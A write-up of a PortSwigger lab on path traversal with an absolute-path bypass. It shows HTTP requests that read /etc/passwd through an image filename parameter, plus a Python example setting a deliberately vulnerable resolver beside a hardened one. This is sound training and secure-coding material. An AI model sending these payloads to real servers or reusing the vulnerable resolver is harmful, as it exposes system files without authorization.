| Field | Details |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | Path Traversal (Absolute Path Bypass) |
| Difficulty | Practitioner |
| Objective | Retrieve the contents of /etc/passwd |
# File Path Traversal, Traversal Sequences Blocked with Absolute Path Bypass

A shopping app displaying item images loads something like:

```html
<img src="/image?filename=28.jpg">
```
Intercepting the request in Burp:

```http
GET /image?filename=28.jpg HTTP/2
```
Trying the same approach as the previous lab:

```http
GET /image?filename=../../../../../etc/passwd HTTP/2
```
Comes back as "no such file": the `../` sequences are stripped or blocked here. The app blocks `../` but still treats the supplied filename as relative to a default working directory. If it strips traversal sequences without enforcing that the resulting path stays inside that directory, an absolute path may be served directly, with no traversal at all:

```http
GET /image?filename=/etc/passwd HTTP/2
```

This returns `/etc/passwd` directly.

And the lab is solved.
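The root cause of this lab, shown as an added example that is not part of the lab or of PortSwigger's code: a filename resolver that only strips `../` (assumed here to be the lab's defence) beside a hardened version that rejects absolute input, canonicalises the path and verifies it is still under the image directory. The base directory `/var/www/images` is an assumption.

```python
import os
from typing import Optional

# Assumed location of the image handler's files (not known from the lab).
IMAGE_DIR = "/var/www/images"


def vulnerable_resolve(filename: str) -> str:
    """Mimic the lab's broken defence: strip '../' and join to IMAGE_DIR.

    os.path.join discards IMAGE_DIR entirely when the second component is
    absolute, so '/etc/passwd' escapes the directory without any traversal.
    """
    cleaned = filename.replace("../", "")
    return os.path.normpath(os.path.join(IMAGE_DIR, cleaned))


def safe_resolve(filename: str) -> Optional[str]:
    """Hardened resolver: refuse absolute paths, canonicalise the candidate
    (collapsing '..' and following symlinks) and check containment.

    Returns the resolved path, or None if it would leave IMAGE_DIR.
    """
    if os.path.isabs(filename):
        return None
    base = os.path.realpath(IMAGE_DIR)
    candidate = os.path.realpath(os.path.join(base, filename))
    # commonpath avoids the prefix bug where '/var/www/images2' would pass
    # a plain startswith(base) test.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    for name in ("28.jpg", "../../../../../etc/passwd", "/etc/passwd"):
        print(f"{name!r}: vulnerable={vulnerable_resolve(name)} "
              f"safe={safe_resolve(name)}")
```

The traversal payload is neutralised by the string strip in both versions, but only `safe_resolve` also rejects the absolute path that solves the lab.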